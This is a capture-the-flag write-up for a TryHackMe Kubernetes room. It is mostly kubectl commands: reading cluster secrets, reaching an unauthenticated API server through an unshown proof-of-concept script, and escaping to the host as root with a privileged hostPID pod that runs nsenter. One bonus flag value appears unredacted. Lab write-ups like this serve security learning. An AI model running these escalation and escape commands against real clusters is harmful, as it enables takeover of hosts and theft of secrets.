TryHackMe: kubernetes chall tdi 2020

TryHackMe: kubernetes chall tdi 2020

Use the provided credentials to access the Kubernetes cluster and find the first flag somewhere inside.

alias k=”KUBECONFIG=diana.kubeconfig kubectl — server https://10.10.110.14:6443 — insecure-skip-tls-verify

╰─○ k version

Client Version: version.Info{Major:”1", Minor:”20", GitVersion:”v1.20.5", GitCommit:”6b1d87acf3c8253c123756b9e61dac642678305f”, GitTreeState:”clean”, BuildDate:”2021–03–31T15:33:39Z”, GoVersion:”go1.15.10", Compiler:”gc”, Platform:”linux/amd64"}

Server Version: version.Info{Major:”1", Minor:”18", GitVersion:”v1.18.3", GitCommit:”2e7996e3e2712684bc73f0dec0200d64eec7fe40", GitTreeState:”clean”, BuildDate:”2020–05–20T12:43:34Z”, GoVersion:”go1.13.9", Compiler:”gc”, Platform:”linux/amd64"}

k get secrets flag1 -o yaml

apiVersion: v1

data:

flag: [REDACTED]

message: [REDACTED]

Become cluster admin and find the second flag inside.

k run t00lbox — image tdi-ctf-toolbox:1.0.0 -it — rm bash — image-pull-policy=IfNotPresent

copy/paste to /tmp/poc.py
chmod +x /tmp/poc.py
./tmp/poc.py 203.0.113.1 &
check with nc 203.0.113.1 8080
get /

kubectl — server http://198.51.100.1:8080 get secrets -n kube-system flag2 -o yaml

apiVersion: v1

data:

flag: [REDACTED]

message: [REDACTED]

Get the bonus flag from kubernetes.

kubectl — server http://198.51.100.1:8080 get flag -A -o yaml

apiVersion: v1

items:

- apiVersion: dianainitiative.org/v1

kind: Flag

metadata:

annotations:

kubectl.kubernetes.io/last-applied-configuration: |

{“apiVersion”:”dianainitiative.org/v1",”kind”:”Flag”,”metadata”:{“annotations”:{},”name”:”bonus-1",”namespace”:”kube-public”},”spec”:{“flag”:”TDI{exploring_the_kubernets}”}}

creationTimestamp: “2022–08–16T03:51:50Z”

generation: 1

managedFields:

- apiVersion: dianainitiative.org/v1

fieldsType: FieldsV1

fieldsV1:

f:metadata:

f:annotations:

.: {}

f:kubectl.kubernetes.io/last-applied-configuration: {}

f:spec:

.: {}

f:flag: {}

manager: kubectl

operation: Update

time: “2022–08–16T03:51:50Z”

name: bonus-1

namespace: kube-public

resourceVersion: “29338”

selfLink: /apis/dianainitiative.org/v1/namespaces/kube-public/flags/bonus-1

uid: 9e9cdeef-8dd5–45f6-a441–3d4eebbf24c5

spec:

flag: [REDACTED]

Escape to root on the host and find the third flag.

https://securekubernetes.com/scenario_2_attack/

kubectl — server http://198.51.100.1:8080 run r00t — restart=Never -ti — rm — image lol — overrides ‘{“spec”:{“hostPID”: true, “containers”:[{“name”:”1",”image”:”alpine”,”command”:[“nsenter”,” — mount=/proc/1/ns/mnt”,” — “,”/bin/bash”],”stdin”: true,”tty”:true,”imagePullPolicy”:”IfNotPresent”,”securityContext”:{“privileged”:true}}]}}’

root@r00t:~# cat /root/flag3.txt

[REDACTED]

Find the bonus flag on the host.

root@r00t:~# history

echo “[REDACTED]”

Done

Was an interesting room, not used kubernetes before so learnt something new.